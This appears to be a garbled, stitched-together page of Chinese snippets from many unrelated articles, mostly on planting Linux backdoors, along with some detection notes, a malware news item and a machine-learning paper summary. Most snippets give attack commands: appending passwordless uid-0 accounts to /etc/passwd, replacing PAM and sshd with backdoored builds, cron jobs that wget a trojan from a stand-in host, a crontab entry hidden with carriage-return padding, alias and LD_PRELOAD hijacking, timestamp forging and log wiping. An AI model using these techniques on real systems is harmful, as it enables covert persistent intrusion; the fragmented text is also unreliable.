在服务器木马后门检测中rookit也是根据特征的,他们检查的都是某一些rk的看这个root或者一些其他的通用型root的,但我现在所使用的项目,它这个UK的可能比较小众,所以没有被检测出来。...我们来看一下第二个工具,叫rookit hunter,这也是一个系统可以直接安装的工具。那安装完毕之后,执行这条命令就可以了,执行的过程我就不给大家讲了,你只要一路回车就可以了。重点是什么?...如果实在排查不出来,可以将系统的这些检查出来的面料在同版本系统内拷贝过来一份,将原有的删除,那咱们怎么删除?隐藏的root的。 Look at。它可以隐藏文件,那它就可以隐藏自身。...那第二种方法就是说这种就比较顽强的了,你要把Linux挂载到其他的Linux系统上,去找到它,这样的话把它删除掉就可以了。...那请勿在生产环境测试的因为rookit并不是一个稳定的内核,一旦插入的内核有可能导致整个Linux崩溃,如果遇到一些被替换了系统命令文件的木马后门无法查找的话可以向服务器安全服务商SINE安全寻求技术支持进行详细的木马后门排查
系统账户后门是一种最为简单有效的权限维持方式。攻击者在获取目标系统权限的前提下,通过创建一个系统账户作为持久化的据点,这样可以随时通过工具连接到目标系统,达到对目标主机进行长久控制的目的。...,攻击者和目标系统可以进行数据交互,就可以根据系统反馈的提示信息创建系统账户和设置登录口令。...系统账户的口令。...`openssl passwd -1 -salt 'salt' 123456` test -o -u 0 -g root -G root -s /bin/bash -d /home/test 查询当前Linux...系统隐藏的系统账户后门,可以通过查询/etc/passwd文件中的新增的潜藏用户,也可以通过awk指令查询uid=0和uid>=500的用户名,如图3-1-2 awk指令查询用户名。
, Centos 以及 Rocky Linux 等没有这个文件,甚至系统级配置文件位置都不同 根据 /etc/vim/vimrc 中注释描述,将所有系统侧配置文件都放置在 /usr/share/vim/...删除掉刚刚配置 $VIMRUNTIME 的内容,采用 Linux 环境变量的方式进行配置 果然,$VIMRUNTIME 是从 Linux 操作系统的环境变量来的 因此永久修改 VIMRUNTIME...不一定会修改 runtimepath ,只有通过Linux 操作系统环境变量来永久修改 VIMRUNTIME 时才会修改 runtimepath 的值,通过vim系统配置文件的方式永久修改 3) runtimepath...是否可以通过环境变量设置 可以看到并没有什么影响,因此 runtimepath 的值并不是来自于 Linux 操作系统环境变量 4) runtimepath 是否可以通过配置文件修改 从结果可以看出...制作后门文件 1) 下载源代码 在相同版本的 Linux 主机 B 上下载相同版本 vim 源代码 在主机B上编辑更新源,取消 deb-src 的注释 在主机 B 上下载 vim 源代码(可以指定版本
Linux操作系统后门 alias alias 命令可以设置别名 执行 ll 相当于执行 ls -l alias ll=ls -l ssh 后门设计 在管理员使用 ssh 时生效,后门将输入的 ssh...tar -xzvf Linux-PAM-1.1.8.tar.gz 修改源码,添加后门代码 vim ....替换原有 PAM 模块,添加后门 cd Linux-PAM-1.1.8 编译 PAM 源码 ..../modules/pam_unix/.libs/pam_unix.so /lib/x86_64-linux-gnu/security/ 后门测试 使用添加的密码 test 登陆 ?...名为 sshd,位于 /usr/sbin/sshd,将系统原来的 sshd 移到 /usr/bin 下 创建后门 cd /usr/sbin/ mv sshd ..
$(nohup vim -E -c "py3file demo.py"> /dev/null 2>&1 &) && sleep 2 && rm -f demo....
sudo 经常被用来将普通用户权限提升至 root 权限,代替 root 执行部分程序来管理 Linux 系统,这样避免 root 密码被泄漏 这篇文章介绍了三种利用其留后门的方法,其中也涉及一个sudo...有趣的特性,在极端条件下可能是系统的薄弱点;同时涉及一个没什么人关注的小知识点 sudo 配置后门 sudoedit 文件所有者后门 sudo plugin 后门 这篇文章以 Ubuntu Server...,该需求相应的配置文件为 /etc/sudoers 以及 /etc/sudoers.d/ 目录下的文件 随着操作系统版本迭代,很多应用程序都将配置文件分为两部分,主配置文件以及主配置文件加载的配置文件...echo '123456' | sudo -S cat /etc/passwd 可以考虑搞新建 空白文件名 文件 + alias 劫持的方法来隐藏新建文件 有时候也没必要新建用户,可以尝试开启那些系统用户试试...,或许有惊喜也说不定,但是这种操作一定要提前试一试 0x02 sudoedit 文件所有者后门 这个后门更偏向于一个概念性的后门,以趣味性为主吧 前段时间复现 CVE-2023-22809 的时候关注到
/etc/profile 【系统级】Linux是一个多用户操作系统。...它可以基于特定的系统调用或系统调用组进行过滤 它可以通过统计特定系统调用的使用次数,所花费的时间,以及成功和错误的数量来分析系统调用的使用。 它跟踪发送到进程的信号。...把strace的输出单独写到指定的文件 /tmp/sshpwd-xxx.log ,这个没啥好说的 -e read,write,connect Linux内核目前有300多个系统调用,详细的列表可以通过...,记录明文密码,这局限性太大了,顶多可以作为一个后门辅助。...后门 ?
chmod u+s /tmp/.sh 加上 suid 位到shell上,虽然很简单,但容易被发现 2. echo "hack::0:0::/:/bin/csh" >> /etc/passwd 即给系统增加一个...3.echo "++">>/.rhosts 如果这个系统开了512,513的port呵呵,就可以 把一个名为hack加到.rhosts文件中,rlogin登陆,无要密码!...6.rootkit后门包 网上有好多地方下载,找找,自己试试看,我也在测试中!不会啊!!!!...-Linux 后门 echo "love::0:0::/:/bin/bash" >> /etc/passwd echo "love::::::::" >> /etc/shadow 有时间的话,就多留几个后门...留了后门就要擦你的PP了,不是吧,这也忘了! Unix系统日志文件通常是存放在 "/var/log and /var/adm" 目录下的。
Ubuntu server 16.04 默认 /etc/ssh/ssh_config
Linux 计划任务是一项服务,由 cron 工具来完成,主要目的就是在无需人工干预的情况下运行作业 PS: 功能较为简单的at命令在Ubuntu 16.04中已经不自带了 0x01 cron服务简介...一会儿再说吧(Linux上万物皆文件,肯定是文件啦!)...,系统自身也有一些依赖性操作 /etc/crontab ?...3 * * * rm -r /home/xxxx/test/* 每隔10分钟下载一下我们的木马 */10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用...0x06 巧用计划任务留后门 (crontab -l;printf "*/1 * * * * /home/helper/1.sh;\rno crontab for `whoami`%100c\n")|crontab
加固后门 正常大家检查是否存在 LD_PRELOAD 后门的时候都是直接 echo $LD_PRELOAD ?...查看原命令设置后门后显示什么样 alias 劫持一下显示,让设置后的显示与设置前一致 千万记得先去看一下是否系统默认或者管理员设置过这个命令的别名,参照之前的 ls 劫持 alias ,让 alias...设置的别名不显示 劫持 unalias ,让系统管理员无法直接用 unalias 命令来取消 alias 等别名 先来 echo 没有设置后门时是这样的 ?...成功劫持 export 没有设置后门时候是这样的 ? 设置后门后是这样的 ?...劫持成功 现在我们来进行验证后门还好用吗 ? 可以看到后门可以使用,那么现在我们来看一下以上各种方法还能否看见我们做的手脚 ? 完美!
0x00 前情提要 在 alias 后门 | Linux 后门系列一文中,我们为了让后门完美一些,修改了后门文件的 atime、mtime,但是 ctime 一直没有办法修改,今天我们来把这一块补齐,...让后门更加完美 atime -> access time, 访问时间 mtime -> modify time,修改时间 ctime -> change time, 状态变化时间 最新版 Linux 中多了一个属性...所以可以查看 stat 的源代码,看一下 stat 应用是如何获取和管理 ctime 的,针对其调用的方法进行系统性地修改应该也是可以实现修改文件 ctime 的 0x03 系统时钟与硬件时钟 Linux...时间系统分为系统时钟和硬件时钟,系统时钟存在于Linux 内核中,而硬件时钟存在于硬件主板上 从两种时钟的命名上可以看出,硬件时钟肯定是要比系统时钟更加持久,毕竟系统时钟系统关机就没了嘛 硬件时钟靠着...详细知识可以查看鸟哥的网站 http://cn.linux.vbird.org/linux_server/0440ntp.php 查看系统时钟 date 查看硬件时钟 sudo hwclock --show
Doki,被称为是一个完全无法检测到的Linux后门,主要利用一种无记录的方法,通过狗狗币(一种加密货币)区块链来联系其运营商,从而动态生成其C2域地址。 ?...C2域 使用embedTLS库进行加密功能和网络通信 创建短生命周期的独一无二的URL,并在攻击期间使用它们下载有效负载 除此之外,攻击者还设法将新创建的容器与服务器的根目录绑定,从而使主机访问或修改系统上的任何文件...再加上Doki还利用zmap、zgrap和jq等扫描工具,利用受感染的系统进一步扫描网络中与Redis,Docker,SSH和HTTP相关的端口,存在更大的威胁隐患。...令人惊讶的是,目前它仍然无法被61个顶级恶意软件检测引擎中的任何一个所检测到。...参考来源 https://thehackernews.com/2020/07/docker-linux-malware.html
最近看了苑房弘老师的打靶课程,发现了 MOTD 这个东西,于是研究了一下,发现很适合做后门,早在08年以前就有恶意软件使用了这种方式,今天系统地研究一下 motd,全称Message Of The Day...,是Linux中发送问候消息的功能,一般在我们登录服务器后显示 每次任意用户登录时都会触发motd服务的功能,这个功能的脚本几乎都是使用root 权限来启动的,所以很适合用来做后门 实用部分 随着关注我们的朋友越来越多...root权限 留后门 这个目录下的所有文件在任意用户登录后都会执行一遍,所以我们可以选择新建一个脚本或者修改其中的脚本来完成留后门的目的 以 00-header 文件为例 #!...服务的具体配置文件了,这里涉及一个启动文件 /etc/update-motd.d/50-motd-news 这个文件在 /etc/update-motd.d/目录下,也就是刚才我们放置恶意脚本的地方 具体关于系统服务相关的知识可以查看...- Linux 命令搜索引擎 https://wangchujiang.com/linux-command/c/trap.html # Construct a user agent, similar to
bytes 62348 (60.8 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 2.uname 用于查看系统内核与系统版本等信息...,格式:uname[-a] [root@linuxprobe Desktop]# uname -a Linux linuxprobe.com 3.10.0-123.el7.x86_64 #1 SMP Mon...May 5 11:16:57 EDT 2014 x86_64 x86_64 x86_64 GNU/Linux [root@linuxprobe Desktop]# cat /etc/redhat-release...Red Hat Enterprise Linux Server release 7.0 (Maipo) 3.uptime 查看系统负载信息 格式 uptime [root@linuxprobe Desktop...格式:last[参数] 7.history 用于显示历史执行过的命令 格式:history [-c] 8.sosreport 用于收集系统配置及架构信息并输出诊断文档 格式:sosreport
ssh/ssh_config /etc/ssh/ssh_config.old 2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old 3、下载并安装ssh后门...: 将sshdb.tgz后门程序放置到你自己的服务器的某目录下,并且改成为test.tgz,这里为www.test.com的根目录下 # wget http://www.test.com/test.tgz...# tar zxvf test.tgz # cd openssh 4、设置ssh后门的登录密码: vi includes.h define _SECRET_PASSWD "test1234" ->...#test1234位后门连接密码 5、编译安装: # ....ssh_config touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config 重启服务 # /etc/init.d/sshd restart 6、登入后门
d在我们攻防当中,常常会碰到linux机器,拿到之后为了避免发现 低权限升高权限 创建一个c文件 #include int main() { setuid(0);
perl 和 Python 在做反弹shell基本差不多,Python 那一节有点讲的太多了,大家可以对比一下参数,照着Python的思路移到 perl 上,我...
2019.9.20得知非官网的一些下载站中的phpstudy版本存在后门文件,基于研究的目的,于是有了以下这文。...这个后门估计早就已经失效了。 检测脚本 以下是我编写的pcheck.sh文件,运行后可以递归检测当前目录下所有dll文件中是否包含木马文件的特征值。 #!
开门见山 该工作主要是提出一种攻击,用来躲避后门检测的,针对Wang等人提出来的神经元裁剪方法,给出了一种攻击策略。...在先前的工作中,人们发现在正常样本的输入以及带有后门样本的输入下,神经元的表现是有差异的。根据这些差异,提出了一些基于神经元裁剪的策略来对后门攻击进行防御。...这篇工作的主要核心在于,去尽可能地使得后门样本和正常样本的差异变小。 如下图所示: ? arch 攻击者会训练一个判别器,去判别中间的特征表示是否来自于后门样本。...我们的目标其实是,最小化正常样本和后门样本的神经元激活值,即: 其中 代表着正常样本的第 个神经元的激活值, 代表着后门样本的第 个神经元的激活值。...因此,我们的误差可以重新写成: 其中 是比例系数, 是新模型的参数, 是原有的后门模型的参数。 其中 是指后门样本下表现有差异性的神经元的集合。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
实时音视频
对象存储
即时通信 IM
